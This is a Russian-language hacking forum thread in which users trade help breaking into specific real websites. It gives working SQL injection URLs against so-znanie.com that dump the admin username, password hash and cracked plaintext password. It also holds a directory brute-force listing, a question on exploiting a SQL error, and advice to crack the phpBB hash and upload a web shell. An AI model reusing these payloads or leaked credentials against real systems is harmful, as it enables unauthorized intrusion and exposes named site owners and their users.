Да все там норм, обыкновенная защита от ботов, тип поля как видно текстовый, максимум моно пути извлечь: /home/la2onix8/public_html/kernel/components/antiddos/anti_ddos.php От ддоса защищаются собаки))) О скуль инъекции речи нет...
Конечно нет скули, если бы была хоть какая-то надежда (даже блинд), тут бы вывелась вторая страница: http://www.la2onix.ru/?act=news&page=3-1
Здрасте На сайте достал логин и пароль админа.Но не могу найти как зайти под админам . глянте пожалуиста so-znanie.com Login: Admin pw: soznanie
Неверный у тебя пароль... Вот и все. Кста, там инъекция есть... http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password)+from+phpbb_users++limit+1,1 брути!
кароче нашел уязвимосьть на сайте такого содержания Attempt to insert NULL value into column 'url_id', table 'Info_new.dbo.usrefww'; column does not allow nulls. Update fails. ссылка примерно такая: index.php?url=199000&ref=1 Как её использовать ?
Закодирован пароль , чем можно раскодировать ? Попробовал черес hashcracking.info , ничего не получилос . ht_tp://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a3a,username,user_password+)+from+phpbb_users+LIMIT+1,1+--
я вот вроде нашел где php.ini но когда его инклудом подключить хочу то получаю это Parse error: syntax error, unexpected ',' in /usr/local/lib/php.ini on line 70 не подскажете с чем связано ?
Эм... Челу вроде как сайт нужен, а не форум... Code: http://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a,id,login,password)+from+admins--+ Code: 1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e И в расшифрованом виде: Code: 1:admin:soznanie Так что правильный у него пасс...
Code: 1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e И в расшифрованом виде: Code: 1:admin:soznanie Если честно , я спрашивал как заити под админам
Мне кажется что админка там заныкана и находится по адресу типа /admin/blablabla.php и на папку /admin/ стоит запрет чтения... Воспользуйся брутером местоположения админки.
Code: error_log - 403 Forbidden robots.txt - 200 OK test.htm - 200 OK test.php - 200 OK db/ - 200 OK stats/ - 200 OK config.php - 200 OK ini/ - 200 OK cpanel/ - 200 OK ~root/ - 403 Forbidden cgi-bin/ - 403 Forbidden img/ - 200 OK images/ - 200 OK forum/ - 200 OK article/ - 200 OK articles/ - 200 OK cgi-sys/ - 403 Forbidden css/ - 200 OK gallery/ - 200 OK js/ - 200 OK чето хз где там админка, цпанель с sql на сайте никак не связана, а больше ниче не нашел... Так что брутьте пхпбб хэш и лейте шелл
